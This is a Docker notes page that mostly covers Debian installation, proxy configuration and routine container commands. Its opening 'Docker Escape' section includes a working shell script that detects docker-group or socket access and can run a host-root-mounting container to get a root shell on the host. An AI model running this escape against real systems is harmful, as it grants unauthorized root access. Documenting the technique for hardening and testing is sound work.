Docker

Containers for micro-services.

Securing Docker

Privilege Escalation via Docker

See GTFOBins (https://gtfobins.github.io/gtfobins/docker/). Membership in the docker group, or write access to /var/run/docker.sock, is equivalent to root on the host: the daemon runs as root and will bind-mount / into any container it is asked to start, so no kernel bug is needed.

Docker Escape
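The check and the command behind both of the sections above (host-side escalation through the docker group, and escape from a container that has the host's docker socket bind-mounted), as an added example that is not the page's own code. The group/socket test and the mount-host-root command are the GTFOBins technique; the function names and the DOCKER_SOCK variable are this example's own assumptions.

```sh
#!/bin/sh
# Added example: decide whether this shell can talk to dockerd, then show the
# GTFOBins-style "mount host root and chroot into it" command.
# Works from a host account in the docker group, and from inside a container
# into which the host's /var/run/docker.sock has been bind-mounted.

DOCKER_SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"

# can_reach_docker GROUPS SOCKET
#   GROUPS: space-separated group names, as printed by `id -nG`
#   SOCKET: path of the daemon socket
# Returns 0 when the docker group is present or the socket is writable;
# either one is enough to drive the root-owned daemon.
can_reach_docker() {
  case " $1 " in
    *" docker "*) return 0 ;;
  esac
  [ -w "$2" ] && return 0
  return 1
}

# Builds the docker command that mounts the host's root filesystem into a
# throwaway Alpine container and chroots into it: a root shell on the host.
escape_cmd() {
  printf 'docker run --rm -it -v /:/mnt alpine chroot /mnt sh\n'
}

main() {
  if can_reach_docker "$(id -nG)" "$DOCKER_SOCK"; then
    echo "[+] dockerd reachable; host root is one command away:"
    escape_cmd
    # Only run it when explicitly asked, since it drops you into a host root shell.
    if [ "${1:-}" = "--run" ]; then
      eval "$(escape_cmd)"
    fi
  else
    echo "[-] not in the docker group and $DOCKER_SOCK is not writable"
  fi
}

main "$@"
```

Run it with no arguments to enumerate only; pass --run to execute the escape. If the docker CLI is missing inside a container but the socket is mounted, the same request can be issued to the socket directly, since the CLI is just an HTTP client for it.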

Installation

Run as root (the commands below assume a root shell; otherwise prefix them with sudo).

# Add Docker pgp key
# Note: apt-key is deprecated on Debian 11 and later; there, store the key under
# /etc/apt/keyrings and reference it with signed-by in the repository line instead.
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -

# Verify it is the key Docker publishes (fingerprint 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88)
apt-key fingerprint 0EBFCD88

# Configure Docker apt repository
# "stretch" is the Debian 9 codename; replace it with the codename of the host (lsb_release -cs)
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list

# Refresh the package index
apt-get update

# Remove any older or distribution-packaged Docker first so the installation is clean
apt-get remove docker docker-engine docker.io

# Install Docker
apt-get install docker-ce

Behind a proxy

# https://docs.docker.com/config/daemon/systemd/#httphttps-proxy
# https://docs.docker.com/network/proxy/

# Add Docker pgp key
# Download the key (https://download.docker.com/linux/debian/gpg) through the proxy with a browser or curl -x, then import the file
apt-key add /root/Downloads/pgp

# Verify it is the key Docker publishes (fingerprint 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88)
apt-key fingerprint 0EBFCD88

# Configure Docker apt repository
# "stretch" is the Debian 9 codename; replace it with the codename of the host (lsb_release -cs)
echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list

# Refresh the package index (apt itself needs the proxy too: Acquire::http::Proxy in /etc/apt/apt.conf.d/, or http_proxy in the environment)
apt-get update

# Remove any older or distribution-packaged Docker first so the installation is clean
apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Create a systemd drop-in directory for the docker service
mkdir -p /etc/systemd/system/docker.service.d

# Create proxy configuration
# Registry traffic (docker pull/push) is HTTPS, so HTTPS_PROXY is the variable that actually matters;
# NO_PROXY keeps localhost and internal registries off the proxy.
nano /etc/systemd/system/docker.service.d/http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://<username>:<password>@<proxy-server-url>:<port>"
Environment="HTTPS_PROXY=http://<username>:<password>@<proxy-server-url>:<port>"
Environment="NO_PROXY=localhost,127.0.0.1,<internal-registry>"

# Reload systemd so it picks up the drop-in
systemctl daemon-reload

# Restart Docker
systemctl restart docker

# Verify that the configuration has been loaded
systemctl show --property=Environment docker

# Configure the Docker client to pass the proxy configuration to docker containers
# When you create or start new containers, the environment variables are set automatically within the container. (NOT WORKING YET!!!)
# Caveat: these values, credentials included, are injected into every container's environment and are
# visible to anyone who can run docker inspect on the container or read its /proc; prefer a proxy that does
# not need a password in the URL.
mkdir /root/.docker
nano /root/.docker/config.json
{
 "proxies":
 {
   "default":
   {
     "httpProxy": "http://<username>:<password>@<proxy-server-url>:<port>",
     "httpsProxy": "http://<username>:<password>@<proxy-server-url>:<port>",
     "noProxy": "localhost,127.0.0.1,<internal-registry>"
   }
 }
}

Usage

Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet

Help

sudo docker help
sudo docker COMMAND --help

Show Docker version

sudo docker version

Show daemon-wide info (container and image counts, storage and cgroup drivers, enabled security options such as apparmor/seccomp)

sudo docker info

Start Docker service

sudo service docker start

Test with Hello-world

# Verify if it was installed correctly
sudo docker run hello-world

Temporary fix (lost on reboot) for “Error response from daemon: cgroups: cgroup mountpoint does not exist: unknown.” on hosts where the systemd cgroup hierarchy is not mounted

sudo mkdir /sys/fs/cgroup/systemd
sudo mount -t cgroup -o none,name=systemd cgroup /sys/fs/cgroup/systemd

List containers (-a includes stopped ones; drop it to see only running containers)

sudo docker container ls -a

Stop a container

sudo docker stop <container ID>

Remove all stopped containers

# Preview what prune is going to delete, then delete it
sudo docker container ls -a --filter status=exited --filter status=created
sudo docker container prune

List Docker images

sudo docker image ls -a

Remove Docker image

IMAGE_ID=35438515b976
sudo docker image rm $IMAGE_ID
# With -a this removes every image not used by at least one container; without -a only dangling (untagged) images are removed.
sudo docker image prune -a

Run OS commands in the container

List containers

sudo docker ps

Interactive shell (this is docker exec through the daemon, not SSH: nothing needs to be listening inside the container)

sudo docker exec -it <container ID> /bin/bash
# Minimal images (alpine, distroless-style) often have no bash; fall back to sh
sudo docker exec -it <container ID> /bin/sh

Execute OS command

# -it is only needed for interactive programs; a one-shot command works without a TTY
sudo docker exec <container ID> ps